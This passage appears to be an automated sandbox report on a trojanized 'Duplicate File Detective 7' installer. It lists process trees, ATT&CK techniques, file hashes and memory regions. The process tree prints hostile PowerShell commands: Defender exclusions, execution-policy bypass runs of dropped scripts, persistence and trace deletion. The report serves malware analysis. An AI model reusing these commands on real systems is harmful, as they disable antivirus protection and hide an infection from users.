        powershell $S = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1416
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3120
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\rsmjl.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4864
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /IM 3596 /F
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        
        PID:4884
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4956
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Roaming\Xtrem.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1296
- C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Setup.exe
  "C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:2844

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B743F589460C4F9ED2BCD881ED2BEDFC C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\GlassPack.exe

Filesize
24KB

MD5
2f8c33ab91e3897522bb6add4b6e1375

SHA1
dd6159fe631838b3bf1bf27bc90ea1acbaf381c4

SHA256
d0f5829a3fe65ff01901b2742e9e19cbb848d5b55452103ab1b8c82e87fa6872

SHA512
da28c79295704dc476ea28c69cfe9108b75be68912c7455d6b6eb6e3df07c6bd6e704f586433d79a3580bfb313cf459b2626d5ce34e3bc85b787b82a83358a3b

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\Setup.exe

Filesize
24.6MB

MD5
72dcd6cd9d1d40a56276fc1470936a61

SHA1
8c2dd4c7082cc99f8624bfcf20470f21ff4fd96a

SHA256
1275a1db0ed63a634cba3f83f17d46a2e68c51bec88c29cab998fe348a821bc1

SHA512
a3677918f4e1f19c8f589fcf7feddbd10740c4fe457949f6b8772d919a177872bcd507e3cd5db7b05811c4aff85a6336b41b988d47cb471d1db175173e38d77d

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-environment-l1-1-0.dll

Filesize
30KB

MD5
2965c12277fcb719d97203232f1e39ac

SHA1
3d320fd6d983a4f62c718fdd3477c681168486d9

SHA256
a1651712774d01c909689a85b5b7a69da91db33ef133f8ac75ef19227b4b5969

SHA512
40315dbb91fd4deb7938ccd54994e9d60a10bdd693f37e3e7f3be1e2feb77c9424c0cf3a66c2b9461a9bbe13ce6755886c235b80afbe0917df8b22e89aba13f9

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-locale-l1-1-0.dll

Filesize
30KB

MD5
1f15d860ca19f705c90fadc92035b91a

SHA1
331e7ae488a7c39e679d988459f87392c908e2c5

SHA256
b0b76ef49fd049adf77725e131e3866a8298cb0eec13305647ce5430c262f957

SHA512
10a0deb71ac7a72801faf37cff5133714f27def278381aed9638f92a6e9aacbd2969692b0081491f77b77e08372366c0c9d9de685d417f07b682261af49befff

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\api-ms-win-crt-math-l1-1-0.dll

Filesize
39KB

MD5
4d45e807872993208c4102865154dbac

SHA1
a1653df01dc76bec0876a788c5e7c5a5f77aab76

SHA256
eca01f80b0eb81523a17432715dd86b2463ca072bbba8a9af7dfd9123d2cf8c5

SHA512
31b7bfea6f7bd083ffd6b74c8c951ab66a3fc9b7e4f1e44ca27ad7d6d61a9301e4b61f49f1fa7b126e20bb991cfad4eca3c4438a80a500d5656744360081a14a

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\jli.dll

Filesize
3.2MB

MD5
90d62a7d449acf1611f64271ae931c35

SHA1
ac20750a1ee03a1fff13b7059324ebe6914f88e0

SHA256
030894df7d8c8b08cbbade552f19e3975f7f97b2fd6b086c6a1dc6e807a12b60

SHA512
67842d26388fdfd5672491cbf7b80699d51b83ac40f939dabb2b8d568c25159e5329b25b2a4339acaedf3e8c706e10363e09c486202a69e2e6961e66ab6d3f3a

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\msvcpcore.dll

Filesize
3.1MB

MD5
b60128294a99fb3ece3f5ce7c17eda97

SHA1
d19a230a8ae180e510c86123a8184f9c936b8537

SHA256
41940c2a598e380b5b89b2864afe042186f96ac3058d893fdbe31b49848a7251

SHA512
8bd5a2aa7770823945d67314e746a6ba679c1432302e0699ffc7ee7dea92c70729362c042f15df82623a0ef4bbf43f9b776c089048b5e3eac8d1220e3d65d4e2

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\vcruntime140.dll

Filesize
107KB

MD5
146eb6b29080a212b646289808ae0818

SHA1
e5d9801f226ecd3af662df225f751ae8a8934357

SHA256
f66c606d2ee6bbca375ab4268b0c6aef5170a4ca580a00e17a56057a7a127743

SHA512
0824b42ca2539709f77134ffea9c10fc9f4c126b6a309bd5d3ddd02a660ef98d63b178219d83b173340798c479a1008c2d4f57830898673043fee2450a210a58

Download Submit
C:\Program Files (x86)\Key Metric Software\Duplicate File Detective 7\vcruntime140_1.dll

Filesize
49KB

MD5
c106bef63b8db2f32de277b0c314249f

SHA1
b172b5809f95bd4f4181fe30c30368b50a27f08a

SHA256
dced523e24b4374522c86f7bbfc0ac8d8e1078336492629722081339adaad9ba

SHA512
77aab947ffec187f054c68899f2b4186a53b2901fb74ee6702586c1207a4abea238c64da0aa3ebe56695c31606b315f9a6289ca1748e9770fcfca5816e7e6580

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
8b9969bf7c8b769e3c35d50853e82fb3

SHA1
098b705390c5e64dae54b166f381839ec9f130db

SHA256
710363c9d87acde13a615715a625a5a57e98322372834a3425fb722f760ad049

SHA512
1905b12ad9950a727a90b3f7131300a15c4589a778acfc34ac4c085508099c1cbb4e38a5d1f4fc2da6aa11abe1f3bfbaec1a9d2d8cff15b3e062d3b9ed3882c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\ausun.ps1

Filesize
264KB

MD5
087a23b01304b135684a7a2054d34051

SHA1
fa10887da0947022680d86acdea3cfcb96a8e81c

SHA256
69c1f4e6a06c1a8d7dfdeaf5cd31c3e164606b2bfc10c115bc1d45c81d8c4c55

SHA512
4c5a000b84e76591340476694312344f179dece14afb19ec81438424c1ffc3a75a54f1716ff424ae0fc7b42f4e43b3e7b92d5d084176e83e6c307831f1baafbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\rsmjl.ps1

Filesize
315KB

MD5
ce8d19661bf31572e12ded0e22d2eb04

SHA1
524946c55ee4466fee86b7f1c4b727833684fe1a

SHA256
f6ee249fac8a35bc33e01bd3a6a547cee8c5b35f8d5bbdb4e6e1817ad9b2a667

SHA512
2bdd9231c96220f419734566d698e550abc9f731ce9d7bb56891d74980a8e74bd4a1e5143fc09eb23b7386d3d2cce5928ce22b965de24243a70cb13be99659c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
371fb5caf33f8633763e9ce1097fc024

SHA1
69040b7c06e306b3783a87244624ba607361fb72

SHA256
f38c52c939f2ef4a4c544e6d9d65b877faf0eb6aa122dcffca06db83e4832b5e

SHA512
0a9cf88560d9ed9ee108b2cc28d643b06e5805727f5b00687782ecdb1f10cf4985e7cd15bd99dc40e8aadf0f16e223a5da273ffa44d924f8b55e5174c4182ca7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
13KB

MD5
79e8e1f3eb3e4fef879c35f8f939ad73

SHA1
5fdbd5f91251c80eebc0ecc16fc0b305aff46d77

SHA256
be4279004d371fcf84805f44dbcdbab90fac1ed5d072b7fff981cad8f2b101b6

SHA512
656b8849f582f12d2d21c4498447aed0898e14a10bc969e95f9972287ba4b6fa6be325815e382bda4b67250e7e9a101c186cb14fec0fb0f8767568a8a84da05a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
13KB

MD5
8e4f648763e4fd686d5012223249e902

SHA1
b18f5ccd4bb1cbb2dd39f889c587c65cc09f739b

SHA256
e991ddc7da91799e836efd34a6c23e2cd4622cb067d48e59c265b35d46e39cdd

SHA512
c2068b61e87402bd306b2e2b4498f1d3a0d7a6e93c131e2cd9819ebbb0f579f3305d0620bd99cf658b973df68329b2fabb230c95fe3ef126b581328476a48991

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b946f45de29bc2dba2c9601bdce49e30

SHA1
c6e70e5bcaf062a25fdc24736b45bba38a9c9c06

SHA256
a399da2580b011541893cabc1d14e8dd548594d3b007c3c15dd26787e6fc0f6c

SHA512
c33d4c0bfbb22604fea5cc2488355638d93e49760917b3bbabf4146cf6befc2982fa0b768589b8c4f641022c729a44fa6243e728972ab7ee81262e593a5bb823

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
2883f9f8fb045b067c08d6e42abde1ad

SHA1
29eb258915b79b6e7c0984ffdcb4292fa90b93de

SHA256
08a1f0818aa62a286b600518c4a78ada11f2f0b91d079b348cf744b10b87962c

SHA512
48cb25d28450daee9db0b3def0db1c4b075fee2be3601b7005b03ac83097354c92b12f9da76b691666ca039c848c1280af35670150d8666b0787721ab1293fa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
fac14a02fe249f59269cd928c783a3e2

SHA1
4d0fe51eef5461d9cfe861ae9441b4a3585ce3cc

SHA256
aad8fecfdf6319d61bcee840dbf76c41555d37fa5d59184f6876d1c7613f8a18

SHA512
73beb3683bc3848099b09ffcadfb6469d499d9e974eb38b8303d3313cfcc734535ce3c3461e43e474cee85979e9cd02b81b8b1c472a6d1f95073b2691e1f4efb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
f4e303b87f86087bbe71ee9d8f98a13a

SHA1
8a793e562fbd68d545d39cbffe6ffcd6d71a6b92

SHA256
307cb344c289522dbd9000440a97de8ca30c9b46932aa73f7cb0521b2590e338

SHA512
6fa2eb90fcbdb42835d4a83f10576f9f018f266521db388533411ed4fd9c4f5919a112134749591382ecd63ab23fb9e0ddc505e13d5df157c34742993343b586

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
65abdf362d55e16c2306761dad3406ad

SHA1
9c00ffac66cbbc3cf5de94f388e9ebe52ad4f7ef

SHA256
b1daf9fa1236430120e3fde8e1a18cf50b70132f495db8b9b0a03d5ae7c419ec

SHA512
26b8be5566733e401d101574c3397729686e08333b6ce7eb84e548d3922bc3b49267717bf85950be1b6e2244fc9e270745de4ea354d5a4e48ced98d4a8ac07d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\0003.tmp

Filesize
2.8MB

MD5
21768169a79e2d9035a82d58b93853d7

SHA1
2d92462d2dc9fffe6f8c17770e962d09d227d392

SHA256
02fdc249aa63a694b95fcb029e2e4a68f5e7d5058128b4a9d7cab0b9d936f359

SHA512
5ad9107393dd4ab4648121f68776664068bd5b0f827baad524e05a433d3d6e588251e862ce4e8add13bed7b41dc0af49876290ea227836178edf31760df474b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2844\background

Filesize
20KB

MD5
3ddc9ae9395280f17e5003076f8221bc

SHA1
3c1cda38a92690c3eac7169914aee2d0a2b804f4

SHA256
5dc5506f2ddbf259b48e26ab44429804571a2da19fa4a4be7bca63cef6a790d4

SHA512
4c911fc5e3b13dfccb7fb621f52a756bdedcf4746d1f3135de14e337ca3106bb92f2c114cef3f4bf1a4498a88dd386a53597ed2740d047a2cf0885f37ab6bc22

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI9C8A.tmp

Filesize
495KB

MD5
cfab78ac0d042a1d8ad7085a94328ef6

SHA1
b3070cc847ba2739450dc9bd05040df83e7d85d2

SHA256
17b10df05b4b92735b673914fe2bf0c0d7bbda5b4a8f9a7fc81a0efaa4380168

SHA512
647b909f1e833dd08d99aaa29a3404e64c58356dfa0a3abeb788768d74abb0948d2b612a6da62f2617270cd85110e8aa2b26e5e4558af0d0b84f920c40533438

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vt1vr15u.1mu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DriftCar.vbs

Filesize
689KB

MD5
33c027e0caf4cdc2ac806701893facb7

SHA1
8e4c1e4fd6b2a160caa7b0cdf8d8d31c7696dfc7

SHA256
1ff562a7a6ff64bc964510560e1b2cd170074f0b0993dd71eb9ccd10c0aedd28

SHA512
53d4fd5e5a2e0e05c2d276220a64c6ee96d2fa4cc946606b9a6962776c0a14b7610491cc7f84567d14b3f3554bc4da947c20dbb5b1341048beb259f85fb4113f

Download Submit
C:\Users\Admin\AppData\Roaming\Key Metric Software\Duplicate File Detective 7\install\9205619\DFD7-Setup.x64.msi

Filesize
2.5MB

MD5
53234e3890f014c9c321e686188df21e

SHA1
05010b524ff8bb19e0785083d13290a453d644bb

SHA256
90a7de1c44b8bae54cbcf347c66a4a8fbaabd27ee62e6453c719e6b11bb91911

SHA512
ef2fa56da31c7a767e479f1ddfa173b237d4192a483ff4af4688b29681f43dd508667fa74169d67d441022baa9ed14ccd0a3a3794311bb1b1d2da9bf3b242af7

Download Submit
C:\Users\Admin\AppData\Roaming\Key Metric Software\Duplicate File Detective 7\install\decoder.dll

Filesize
206KB

MD5
899944fb96ccc34cfbd2ccb9134367c5

SHA1
7c46aa3f84ba5da95ceff39cd49185672f963538

SHA256
780d10eda2b9a0a10bf844a7c8b6b350aa541c5bbd24022ff34f99201f9e9259

SHA512
2c41181f9af540b4637f418fc148d41d7c38202fb691b56650085fe5a9bdba068275ff07e002e1044760754876c62d7b4fc856452af80a02c5f5a9a7dc75b5e0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
5e1d8f00f36aa3d588112ce30a89f09e

SHA1
47f100cd93ce5c63ece78bf77b017ecf70dafe05

SHA256
5105b31f67b8a59f364aabea17c8ca0042f07d223c886d912dde18f269998fb1

SHA512
e675cc8507e2496e45ae9f9c6f5b9f261eb6cf2b4416dbde1127d55191afbf279a80703f78435ed90e8b4cb7589dc1c12d81cfd196cc90c64e8a2b8519e7a131

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
6KB

MD5
634c6f8b86f751c2aac316ea9c9440d0

SHA1
ab6fc91dbf535f04a409b741e9f8bb34e75a48e6

SHA256
0fa3fc7e6fdf22ec8bb06ca92073a79d151d71f480853899b9003b72976050f1

SHA512
146e087679ae9fa78c0a8f32173fc238661e01ab52d11b53d3763c83bc8d32b82c946b27927d1a06f53d4f7179ad7a64b9e59b3487fbbe29dc603c0ad7f30c6c

Download Submit
C:\Users\Admin\AppData\Roaming\Xtrem.vbs

Filesize
689KB

MD5
a19cd9caf6a3a6081fe69335fc52a605

SHA1
46d57a86b8bf3216281981486d07356ee4ece14b

SHA256
b6015e3aa8ba920b8539692e691ceeb24b1263633c5970e8d78d3411f41bcfda

SHA512
b14b86d35e13460aeca749348ed33b1c1e77ba5e6941eac106ee0f3bd3c4cd3bc1d7e5c0e8f98ee127929b8d2960f558be61a056cbd0439a05e14f00e75e6084

Download Submit
memory/364-263-0x0000000006910000-0x000000000691A000-memory.dmp

Filesize
40KB

Download
memory/364-264-0x0000000007860000-0x00000000078FC000-memory.dmp

Filesize
624KB

Download
memory/364-195-0x00000000068B0000-0x00000000068CA000-memory.dmp

Filesize
104KB

Download
memory/364-194-0x0000000007CB0000-0x000000000832A000-memory.dmp

Filesize
6.5MB

Download
memory/1416-339-0x000000006ED00000-0x000000006ED4C000-memory.dmp

Filesize
304KB

Download
memory/1704-359-0x000000006ED00000-0x000000006ED4C000-memory.dmp

Filesize
304KB

Download
memory/2300-426-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2528-115-0x0000000005240000-0x00000000052A6000-memory.dmp

Filesize
408KB

Download
memory/2528-146-0x0000000005A90000-0x0000000005ADC000-memory.dmp

Filesize
304KB

Download
memory/2528-143-0x0000000005A00000-0x0000000005A1E000-memory.dmp

Filesize
120KB

Download
memory/2528-125-0x0000000005450000-0x00000000057A4000-memory.dmp

Filesize
3.3MB

Download
memory/2528-114-0x0000000004A50000-0x0000000004A72000-memory.dmp

Filesize
136KB

Download
memory/2528-113-0x0000000004AA0000-0x00000000050C8000-memory.dmp

Filesize
6.2MB

Download
memory/2528-112-0x0000000004430000-0x0000000004466000-memory.dmp

Filesize
216KB

Download
memory/3120-373-0x00000000073A0000-0x0000000007436000-memory.dmp

Filesize
600KB

Download
memory/3120-374-0x0000000007300000-0x0000000007322000-memory.dmp

Filesize
136KB

Download
memory/3596-91-0x00000000055E0000-0x0000000005672000-memory.dmp

Filesize
584KB

Download
memory/3596-100-0x0000000007780000-0x00000000077BC000-memory.dmp

Filesize
240KB

Download
memory/3596-102-0x0000000072A9E000-0x0000000072A9F000-memory.dmp

Filesize
4KB

Download
memory/3596-87-0x0000000000400000-0x0000000000724000-memory.dmp

Filesize
3.1MB

Download
memory/3596-92-0x0000000072A90000-0x0000000073240000-memory.dmp

Filesize
7.7MB

Download
memory/3596-104-0x0000000072A90000-0x0000000073240000-memory.dmp

Filesize
7.7MB

Download
memory/3596-89-0x0000000072A9E000-0x0000000072A9F000-memory.dmp

Filesize
4KB

Download
memory/3596-96-0x00000000063C0000-0x0000000006472000-memory.dmp

Filesize
712KB

Download
memory/3596-415-0x0000000072A90000-0x0000000073240000-memory.dmp

Filesize
7.7MB

Download
memory/3596-94-0x0000000006760000-0x0000000006D78000-memory.dmp

Filesize
6.1MB

Download
memory/3596-101-0x0000000007830000-0x0000000007896000-memory.dmp

Filesize
408KB

Download
memory/3596-90-0x0000000005B90000-0x0000000006134000-memory.dmp

Filesize
5.6MB

Download
memory/3596-99-0x0000000006740000-0x0000000006752000-memory.dmp

Filesize
72KB

Download
memory/3596-95-0x0000000006190000-0x00000000061E0000-memory.dmp

Filesize
320KB

Download
memory/3596-93-0x0000000005570000-0x000000000557A000-memory.dmp

Filesize
40KB

Download
memory/4696-88-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4696-105-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4696-262-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4696-103-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4696-59-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/4784-349-0x000000006ED00000-0x000000006ED4C000-memory.dmp

Filesize
304KB

Download
memory/4864-413-0x0000000005E30000-0x0000000005E3A000-memory.dmp

Filesize
40KB

Download
memory/4868-411-0x0000000007EF0000-0x0000000007EF8000-memory.dmp

Filesize
32KB

Download
memory/4868-410-0x0000000007FB0000-0x0000000007FCA000-memory.dmp

Filesize
104KB

Download
memory/4868-409-0x0000000007EC0000-0x0000000007ED4000-memory.dmp

Filesize
80KB

Download
memory/4868-399-0x0000000007EB0000-0x0000000007EBE000-memory.dmp

Filesize
56KB

Download
memory/4868-378-0x0000000007E80000-0x0000000007E91000-memory.dmp

Filesize
68KB

Download
memory/4868-372-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

Filesize
40KB

Download
memory/4868-323-0x0000000007AD0000-0x0000000007B02000-memory.dmp

Filesize
200KB

Download
memory/4868-324-0x000000006ED00000-0x000000006ED4C000-memory.dmp

Filesize
304KB

Download
memory/4868-334-0x0000000007B10000-0x0000000007B2E000-memory.dmp

Filesize
120KB

Download
memory/4868-336-0x0000000007B30000-0x0000000007BD3000-memory.dmp

Filesize
652KB

Download
memory/4956-427-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download